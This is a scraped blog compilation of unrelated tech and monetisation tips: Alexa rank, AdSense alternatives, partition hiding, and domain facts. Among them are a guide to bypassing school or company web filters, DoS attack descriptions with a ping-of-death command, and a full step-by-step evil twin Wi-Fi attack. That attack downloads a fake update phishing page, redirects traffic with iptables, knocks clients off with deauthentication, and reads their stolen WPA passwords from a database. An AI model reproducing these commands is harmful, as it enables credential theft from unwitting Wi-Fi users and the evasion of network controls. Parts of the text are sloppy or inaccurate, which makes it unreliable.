How to increase alexa rank tips


hello learner today i am gonna tell you how to increase alexa rank and what it is. Alexa is a very important and powerful tool to improve and rank your website/blog traffic. Alexa ranks sites based primarily on tracking a sample set of internet traffic. Alexa rank checker tool shows the current Global ranking, Reach, 3 month change of multiple domains within the Alexa rank system. This system is one that measures the traffic to a site by users so it's very important to many domain owners, buyers.

1.Claim your site on Alexa.com– Sign up for a free account on Alexa.com and submit your site there. This is the very first and baby step to improve your Alexa ranking.
How to increase alexa rank tips


2.Install Alexa toolbar into your browser – The more Alexa toolbar users visit your blog, the better your ranking will be. You can’t decline this fact that you visit your blog more than any of your reader. So, why don’t you take advantage of your own visit 


3.Add Alexa widget to your blog – Alexa widget helps Alexa servers to better track the traffic. Add one in your blog and see a significant improvement in your rankings. It may not work overnight but something is better than nothing, right?

4.Write Linkable and shareable content – The more useful content you’ll write for your blog readers, then more traffic and backlinks you’ll get. People will more likely to share your content across their social networks and finally it will help you in improving your Alexa rank fast.

5.Drive traffic from Social Media sites – If you are connected with other bloggers on social media, chances will be higher that they all are using Alexa toolbar. The more traffic you’ll get from your blogger friends the better chances will be to get a noticeable ranking.

6.Keep updating your blog with useful content and increase your returning visitors count – Trust me, returning visitors (Happy readers) help a lot to boost blog’s ranking. They are happy readers so they will share your content several times on their various social network profiles. You know how it will be beneficial for you. You know, right? Do let me know in the comments.

6.Showcase your Alexa rank to your social media friends/ bloggers friends and link back to your blog. It attracts huge clicks and your ranking will keep improving day by day. See, how I did that on facebook and got 100+ likes and 400+ traffic.

make money online with Google Adsense

Google Adsense Review 2016

Hello learner today i am gonaa tell you ,how we can earn mony online with google adsense and ,how we apply for it.

Introduction to Google AdSense

One of the oldest online advertising networks still in existence, Google AdSense is also possibly the largest. As such, they are very popular with advertisers and publishers alike. In general, publishers will find the performance and eCPMs of AdSense ads tough to beat, and while it is nearly impossible to get one-on-one support from Google, initial setup is usually quite simple.


Publisher Requirements


Publisher Terms:  https://www.google.com/adsense/localized-terms

Traffic Minimum: None.

Publisher Language Requirement: Content must be primarily in one of these supported languages: Arabic, Bulgarian, Chinese (simplified), Chinese (traditional), Croatian, Czech, Danish, Dutch, English, Estonian, Finnish, French, German, Greek, Hebrew, Hungarian, Indonesian, Italian, Japanese, Korean, Latvian, Lituanian, Polish, Norwegian, Portuguese, Romanian, Russian, Serbian, Slovak, Slovenian, Spanish, Swedish, Thai, Turkish, Ukrainian, Vietnamese.


Prohibited Publisher Content: Pornography, violence, racial intolerance, excessive profanity, hacking/cracking, illicit drugs, drug paraphernalia, sales of beer or hard alcohol, sales of tobacco or tobacco-related products, sales of prescription drugs, sales of weapons or ammunition, sales of products that are replicas or imitations of designer or other goods, sales or distribution of coursework or student essays, programs which compensate users for clicking ads or offers, performing searches, surfing websites, or reading emails, any other illegal content.

Times, Digital Photography School, BusinessBalls.com.

Ads Implementation


Google AdSense Tech Implementation Rating: 5 out of 5.


Google AdSense 300x250 ad unit

Example of Google AdSense 300×250 ad unit

Creating an Ad Unit: To create a new content display ad unit, click the “My Ads” tab, in the sidebar, click “Content”, then “+New Ad Unit”. You can then name and customize your new ad unit’s size, style, custom channel (for tracking purposes), and more. Finally, simply copy and paste the HTML code into your webpage.


Display Ad Unit Sizes Available: 728×90, 468×60, 234×60, 125×125, 120×600, 160×600, 180×150, 120×240, 200×200, 250×250, 300×250, 336×280, 300×600, 320×50, 970×90.


Implementation Technology: HTML, JavaScript.

Mobile Ad Units Available: Yes.
WordPress Plugin Available: Yes (third-party only).

Payment


Google AdSense Payment Rating: 5 out of 5.

Publisher’s Share of Revenue: 68%.
Payment Methods Available: Check, EFT, Western Union, Rapida.
Payment Terms: Net-30.
Minimum Payout Threshold: $10.

GOOGLE ADSENSE AT A GLANCE – THE PROS AND THE CONS


Pros 


Hassle Free Advertising: – Advertising can be very tedious, with trying to find companies who will advertise with you, negotiation of the price and waiting for them to give you the material to post on your website. All this is eliminated with Google AdSense as it provide hassle free advertising. No contracts needed, you just need to add the app on your website and you are ready to advertise any of the high quality ads anywhere on your website. You can also see the results of your advertising through detailed reports showing you how much you have made and how effective your ad is.


Customize the Ads: – Viewing ads can be an eyesore especially if they stand out too much from the overall look and feel of the website. This can cause people to ignore the ad or even not to view the website itself. Google AdSense takes care of this by letting you customize the ad. You can choose what kind of ad you want to show on your website, so if you are a food blog then you can advertise food related companies. This keeps the content of your website uniform and easy on the eyes. You can also customize the look and feel of the ad to match the overall theme of your website.


Free to Use: – Income is revenue less the cost, so you have to keep your costs low if you want to earn big. With Google AdSense you get a chance to earn additional income with no additional cost as you can use the app on your website for free. This means you can maximize your earning from your website and all you have to do is add a window to any page of your website to show the add.


Cons


Limited Layouts: – Google AdSens has limited layout options for the size of ads that you would put as they only have three. You can choose the Banner, Rectangle or Skyscraper layout for the ad. The best option would be the Banner layout as the Rectangle and Skyscraper are narrower and would show less than the Banner.


App Doesn’t Work: – One of the major complaints for Google AdSense is that some users experience errors with it on their websites. Different instances like error messages popping up instead of ads, or the ad window cannot be placed on the website. Other concerns like being rejected by Google AdSense can also be found in the reviews. Though this can be expected in any program used by a large number of people, it would be better to have it at a minimum as errors such as this are hard to address.


Minimal Payment: – The objective of putting ads on your website is to gain additional revenue. While this is the case with Google AdSense, it is not the same as traditional advertising. With Google AdSense, a website visitor would have to actually click the ad on your web page so that you would earn revenue, unlike traditional ads where companies pay you for the space they take up on your site. And even when they do click the ads, they pay is very minimal according to some of the reviews.

Best alternative of google adsense

Best alternative of google adsense

 Hello learner today i am gonna tell you about best alternatives of google adsense,suppose Your Google Adsense account has been disabled or temporarily banned....................................................................................  then don't worry about it we have following adsense alternatives we can easily apply for it and earn money 
1. Infolinks

Infolinks is best in in-text ads. It approves almost all blogs. Infolinks offer four kinds of ads intext ads, insearch, inframe and intag ads. It also works with adsense without violating any rule. To get maximum benefit combine infolink ads and any other image base ads network.


Details –


Publisher Traffic Requirement – None

Payment Method – e-check, Paypal, Western Union
Minimum payout – 50$

2. Media.net


Media.net is a contextual ad service program from Yahoo!Bing Network. Contextual ad service means readers will be see advertisement related to the content of the page.  As per quality of ads you have a good chance to earn huge money. Like chitika you can add media.net ad with adsense ads without violating any rules. To create an account go media.net request an invite.


Details –


Publisher Traffic Requirement – None

Payment Method – Paypal, Wire transfer
Minimum payout – 100$

3. Advertising.com


Another one big advertising network nearly gets two million impressions per day. Advertise.com offers various types of display ads, video, mobile ads and some custom implementation as well. If your blog getting large portion visitors are came from (UK, US and Canada) you should try this ad network.


Details –


Publisher Traffic Requirement – None

Payment Method – Check, paypal
Minimum payout – 25$

4. Buysellads.com


Buysellads is another way to earn some money from blog or website. In short a marketplace for publishers and advertiser to buy and sell ads. Main problem is it does not approve blogspot.com domain you have to buy a custom domain to get approval and its approval process quite hard. You blog monthly visitor should be more than 15k for eligible as a buysellads publisher.


Details 


Publisher Traffic Requirement – 15K Visitor per month minumum

Payment Method – Paypal
Minimum payout – 20$

5. Chitika


Chitika is another one of the largest advertising network after adsense with more than 300,000 publishers. You can use chikita and other ad networks such as adsense ad in same page without violating any rule. It also gives high CPC rate but sometimes clicks from Asian courtiers its give almost zero money. It works best if you mixed chitika ad with adsense ads.


Details –


Publisher Traffic Requirement – None

Payment Method – Check, paypal
Minimum payout – 10$

6. Bidvertiser














Bidvertiser is another display advertising program to earn some extra money. It Offer advertisers to directly bid against each other for publisher ad space.  Bidvertiser offer many types of display ads. It also offer referral program. Its referral program is much better than its advertising program.

Details –


Publisher Traffic Requirement – None

Payment Method – Paypal
Minimum payout – 10$

7. RevenueHits –


RevenueHits is an Israeli-based ad network founded in 2008. Their ads are performing based on CPA so you will get money if visitor click on your ads. Varity types to ads are available so you can choose best ad size for your blog. Its support system is quite impressive if you have any query ask them, they will give you reply within 24 hours.


Details –


Publisher Traffic Requirement – None

Payment Method –  Paypal, Wire Transfer
Minimum payout – 50$

8. Clicksor


Clicksor is a Canada base ad network. Mainly targeted UK base traffic if you try most from this you have to get 50% traffic from Canada, US as well as UK. Clicksor offer six different types of ads for publishers such as text ads, layer ads, pop-up ads, full page popup ad many more.


Details –


Publisher Traffic Requirement – None

Payment Method – e-check, Paypal, Bank Transfer
Minimum payout – 50$


9. Kontera


Kontera is similar to infolinks in-text advertising program. Kontera  check two main rule( 1. atleast 50 word per page, 2. no questionable content of any kind ) to approve your blog or website.  Kontera offers many types of ads such as Text and Image, Rich Media, Video, Expandable, Customizable Units.


Details 


Publisher Traffic Requirement – None

Payment Method –  Paypal, Wire Transfer
Minimum payout – 50$

How to access blocked sites by college,hostel and school admin

How to open block sites by college/company admin
Hello................................................................................................................... learners today i am gonna tell you how to open or access block sites. usually in colleges,hostel and company some sites are blocked.Then how will open these block sites . don't worry ,we can easily open these site using some tool's .




ultrasurf :-                                                                                                                  it is a freeware Internet censorship circumvention product created by UltraReach Internet Corporation. The software enables its users to bypass Internet censorship and firewalls using an HTTP proxy server, and employs encryption protocols for privacy.   UltraSurf is free to download, and requires no installation. UltraSurf does not install any files on the user's ultra surfcomputer, and leaves no registry edits after it exits. In other words, it leaves no trace of its use. To fully remove the software from the computer, a user needs only to delete the exe file named u.exe. It is only available on a Windows platform, and runs through Internet Explorer by default, with an optional plug-in for Firefox and Chrome.you can easily download it from this link Download UltraSurf free after downloading ultrasurf follow these steps--                     1..extract file using 7 zip,rar                                                                                         2.double click on file (to run )                                                                                         3.Click on option button (on top )                                                                                 4.Now click on proxy setting                                                                                            5. Here choose manually proxy settings and then fill your proxy details like proxy host ,proxy port (like host:127.0.0.5 port: 8080) and then save connect  6. now it will generate a proxy and port (like 127.0.0.1 port 9666)use these proxy and port in your browser setting and enjoye...................                                                                                                                                                                                     Tor Browser:-                                                                                                                                                                                                                                                     

How to hide partitions in windows using cmd

How to hide partitions in windows using cmd


    Some times we want to hide our personal data to other for                security reason. Today i am gonna tell you how to hide our data    to other without using third party software. you can easily done   it  by hiding entire partition using CMD....................


1.open command prompt (by press win+r  here type in run cmd enter)                                                                                                                                                             2.Now in cmd type DISKPART  then hit enter                                                                                                                                                                                                               3.Now type list volume enter  (to see all the partition in your system  )                                                                                                                                                                  4.Now important part of this procedure selection of volume which drive you want hide from the main image  you can see every partition assign by some letters and numbers so to hide particular drive (suppose you want hide drive D and drive D assign by number 5) type select volume 5 hit enter. Now drive (partition 5 selected )                                                                                                                                                                                                                                                                  5.Now next thing you have to do hide or remove assign letter of selected drive/partition . Type remove letter D hit enter. here letter D is the drive letter that you have to hide.Now your drive hidden for other some times it need restart so reboot your system and enjoy..........................................................                                                                                                                                                               6.But now problem is if once you hide drive then how you access your hidden drive so don't worry just repeat this procedure up to step 4 and then replace command Remove letter D to assign letter D that sit

what is DoS(denial- of service) attack

what is DoS(denial- of service) attack  



                                  what is DoS(denial-of service) attack???

A denial-of-service (DoS) is any type of attack where the attackers (hackers) attempt to prevent legitimate users from accessing the service. In a DoS attack, the attacker usually sends excessive messages asking the network or server to authenticate requests that have invalid return addresses. The network or server will not be able to find the return address of the attacker when sending the authentication approval, causing the server to wait before closing the connection. When the server closes the connection, the attacker sends more authentication messages with invalid return addresses. Hence, the process of authentication and server wait will begin again, keeping the network or server busy.                                                                                                                                                                There are several different kinds of dos attacks as discussed below:                                                                                                                                                                                                                                                                                        
1. Teardrop Attack :- Whenever data is sent over the internet, it is broken into fragments at the source system and reassembled at the destination system. For example you need to send 3,000 bytes of data from one system to another. Rather than sending the entire chunk in asingle packet, the data is broken down into smaller packets as given below:
* packet 1 will carry bytes 1-1000.
* packet 2 will carry bytes 1001-2000.
* packet 3 will carry bytes 2001-3000.
In teardrop attack, however, the data packets sent to the target computer contais bytes that overlaps with each other.
(bytes 1-1500) (bytes 1001-2000) (bytes 1500-2500)
When the target system receives such a series of packets, it can not reassemble the data and therefore will crash, hang, or reboot.
Old Linux systems, Windows NT/95 are vulnerable.

2. SYN - Flood Attack :- In SYN flooding attack, several SYN packets are sent to the target host, all with an invalid source IP address. When the target system receives these SYN packets, it tries to respond to each one with a SYN/ACK packet but as all the source IP addresses are invalid the target system goes into wait state for ACK message to receive from source. Eventually, due to large number of connection requests, the target systems' memory is consumed. In order to actually affect the target system, a large number of SYN packets with invalid IP addresses must be sent.

3. Land Attack :- A land attack is similar to SYN attack, the only difference being that instead of including an invalid IP address, the SYN packet include the IP address of the target sysetm itself. As a result an infinite loop is created within the target system, which ultimately hangs and crashes.Windows NT before Service Pack 4 are vulnerable to this attack.

4. Smurf Attack :- There are 3 players in the smurf attack–the attacker,the intermediary (which can also be a victim) and the victim. In most scenarios the attacker spoofs the IP source address as the IP of the intended victim to the intermediary network broadcast address. Every host on the intermediary network replies, flooding the victim and the intermediary network with network traffic.                                                                                                         
               5. Ping Of Death :-  The ping of death attack sends oversized ICMP datagrams (encapsulated in IP packets) to the victim.The Ping command makes use of the ICMP echo request and echo reply messages and it's commonly used to determine whether the remote host is alive. In a ping of death attack, however, ping causes the remote system to hang, reboot or crash. To do so the attacker uses, the ping command in conjuction with -l argument (used to specify the size of the packet sent) to ping the target system that exceeds the maximum bytes allowed by TCP/IP (65,536).
example:- c:/>ping -l 65540 hostname
Fortunately, nearly all operating systems these days are not vulnerable to the ping of death attack.


Top Facts About Domain Names You Must Know

Top Facts About Domain Names You Must Know




Top Facts About Domain Names You Must Know 


.com Truncated from the word “commercial,” this TLD was initially controlled by the US Department of Defense.
The domain was originally administered by the United States Department of Defense, but is today operated by Verisign, and remains under ultimate jurisdiction of U.S.
 At present, it is being managed by VeriSign. It was intended for commercial entities and in 1995, the NSF or National Science Foundation, which is responsible for its maintenance, started selling the domain for an annual fee ranging from $50-$100. The commercial distinction quickly became irrelevant though ever since registration for .com (and also .org and .net) soon became unrestricted. 

The very first registered .com domain was Symbolics.com (on  15 March , 1985).

.org – It is known as the first generic TLD and was truncated from “organization.” Like .com it was created to distinguish non-defense interests, except that .org was intended for non-profit entities, such as Greenpeace.org. Nevertheless, the PIR or Public Interest Registry—which manages the domain—currently charges $7.70 per domain name registered.


.mil – This is the domain reserved for the United States Department of Defense. It is short for “military.” The Department still makes use of .com and .edu for its recruitment, general information, and service academies websites, though.

.net – This is another generic TLD. “.Net” was intended for organizations involved in networking technologies. Many believe that a .net is not "brandable" and should not be used to build an online business. But take the example of Oversee.net, one of the most successful domain buying/selling company, founded by a very young entrepreneur, Lawrence Ng. 

Interesting facts:
  • .net is also currently managed by VeriSign.
  • The oldest and still existing .net domain is Nordu.net.







.edu–  
"edu" is one of the top-level domain names that can be used when choosing a domain name. It generally describes the entity owning the domain name as a four-year college or similar educational institution. (Educational institutions below four-year colleges are encouraged to use the geographic "us" top-level domain name.) Along with the second-level domain name (for example: "umich" in umich.edu), the top-level domain name is required in Web and e-mail addresses.
.edu is a sponsored TLD. It was—and still is—designated for four-year, post-secondary educational institutions (colleges and universities). It used to be available to educational institutions from anywhere in the world, but since the majority are using country-level domains, .edu became exclusive for US-accredited post-secondary schools since 2001.

.gov – This is another sponsored TLD, but is restricted for US government use only. Other countries include country code TLDs or second-level domains (SLDs) to their government URLs for easy distinction.

Speaking of country code TLDs (ccTLDs), assigning two-letter characters to signify the country source started 1985 with .uk, .us and .il. Eight more were added in 1986. However, it wasn’t until 2010 when the IANA or Internet Assigned Numbers Authority widely implemented the ccTLDs. Obviously they are exclusive to the country of origin, and the characters or alphabets used are native to the country of origin as well.

Today, these domains are widely used along with a simple, memorable, and often personalized domain name. Anyone interested in creating a website with a personalized domain simply need to contact domain services and purchase the rights to a unique—and preferably monetizable—domain name.

How to Create Evil Twin Access Point

How to Create Evil Twin Access Point



What is Evil twin access point:-

An evil twin, in security, is a rogue wireless access point that act as a Wi-Fi access point so that an attacker can gather personal information without the user's knowledge.
To the user, the evil twin looks like a hot-spot with a strong signal; that's because the attacker has not only used the same network name and settings as the "good twin" he is impersonating, he has also physically positioned himself near the end-user so that his signal is likely to be the strongest within range.
If the end-user is tempted by the strong signal and connects manually to the evil twin to access the Internet, or if the user's computer automatically chooses that connection because it is running in promiscuous mode, the evil twin becomes the user's Internet access point, giving the attacker the ability to intercept sensitive data such as passwords.


Requirements:

1.  Linux(kali)
2. Wireless network adapter
3.  Internet connection to your system
4. Target Access point
1.Open the terminal and type apt-get install dhcp3-server as show below: 2.Open your terminal and type nano/etc/dhcpd.conf, you should have a blank file opened up on your terminal..                                                                             3.Now download the security update page which the client will see when they open up the web browser..
To do that,
Navigate to, cd /var/www in your terminal and do as follows:
rm index.html
wget http://hackthistv.com/eviltwin.zip
unzip eviltwin.zip
rm eviltwin.zip                                                                                                             4.Now type the following to start your apache server and mysql:
 /etc/init.d/apache2 start
/etc/init.d/mysql start                                                                                                                                                                                                                                                           Now the mysql is loaded now we have to create a database where we store the WPA/WPA2 password that the client enters into the security update page..
Type the follows:
       mysql -u root
       create database evil_twin;
       use evil_twin

   now leave the terminal                                                                                                         5.Now we need to find our local network adapter interface name and our local ip
Now open the new terminal and type:
ip route (take note of local ip n wired interface)
airmon-ng
airmon-ng start wlan0
clear                                                                                                                                    6. airodump-ng-oui-update

7. airodump-ng -M mon0 (take note of target essid,bssid and channel number)

airbase-ng -e [ESSID] -c [ch. #] -P mon0

NOTE: [ESSID]  is your targets ESSID and [ch. #] targets channel no.

8 Now open a new terminal and type as follows:

     ifconfig at0 192.168.1.129 netmask 255.255.255.128

9 type the following:

route add -net 192.168.1.128 netmask 255.255.255.128 gw 192.168.1.129

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables –table nat –append POSTROUTING –out-interface eth0 -j MASQUERADE

iptables –append FORWARD –in-interface at0 -j ACCEPT

iptables -t nat -A PREROUTING -p tcp –dport 80 -j DNAT –to-destination [LOCALIP ADDRESS:80]

iptables -t nat -A POSTROUTING -j MASQUERADE

dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0

etc/init.d/isc-dhcp-server start

10 Now we need to force our clients to connect to our evil twin access point and to accomplish this we need to disconnect the clients by performing the de-authentication attack. 

echo [BSSID] > blacklist

NOTE:[BSSID] BSSID of the target

mdk3 mon0 d -b blacklist -c [CH.#]

11 Now go back to airbase terminal to check if any client has connected to your evil twin access point.. 

12 Now go over to the mysql terminal and type

 use evil_twin

select * from wpa_keys; {To view the password entered by the victim in our mysql database}


How to Use Whatsapp Free For Life Time

How to Use Whatsapp Free For Life Time


As we know that now-a-days whatsapp became most popular messenger app. It is a cross-platform mobile messaging app which allows you to exchange messages without having to pay for text message(SMS),not even you can exchange text only you can exchange images,video,audio as well..........................................

Note :- if your trial version is finished, or you want to extend it for a year then you can uninstall it otherwise don't uninstall wait for your trial version finish ,if finish then follow the blew steps  


1.uninstall expire version of whats app                                                                                                                                                                                                                         2.Go to gmail application create new account in your phone once it finished(normally it will take time it depend on your internet speed may be 10-20 minute)                                                                                                                                                                                                                                                                         3.After creation of id go to google play store CLICK on s menu button of your android phone now choose account setting...................................................                                                                                                                                                           4. Once you have done this,you just need to choose the new gmail account, you just created, and download whatsapp once again.                                                                                                                                                                                                  5.Now open whatsapp, and sign into your whatsapp account                                                                                                                                                                                     6. Now You Can use whatsapp free for lifetime.                                                             so enjoy...........................................................................................................



How to remove shortcut virus from system/pendrive

How to remove shortcut virus from system/pendrive



What is shortcut virus:-                                                                                              a shortcut virus is a virus (a malware) that hides your original files inside shortcuts.The way it hides the file remains unknown though the effect is quite visible. The original files are there in the drive itself, but in such a position that you can’t recognize it nor take it out (in the advanced stage).Initially, it doesn’t harms your files but later on, it may make them corrupt or even delete all the files; depends on the type of shortcut virus.

How to remove it:-                                                                                                        1.open command prompt(run as administrator)                                               2.Now type in command prompt attrib -h -r -s /s /d(your system or pendrive letter) example :attrib -h -r -s /s /d D:\*.*  hit enter                                                                
                                                                                                                                                                                                                                                                                                 now enjoy shortcut virus has removed from  your pen drive   or system                

Blogger Tips and TricksLatest Tips For BloggersBlogger Tricks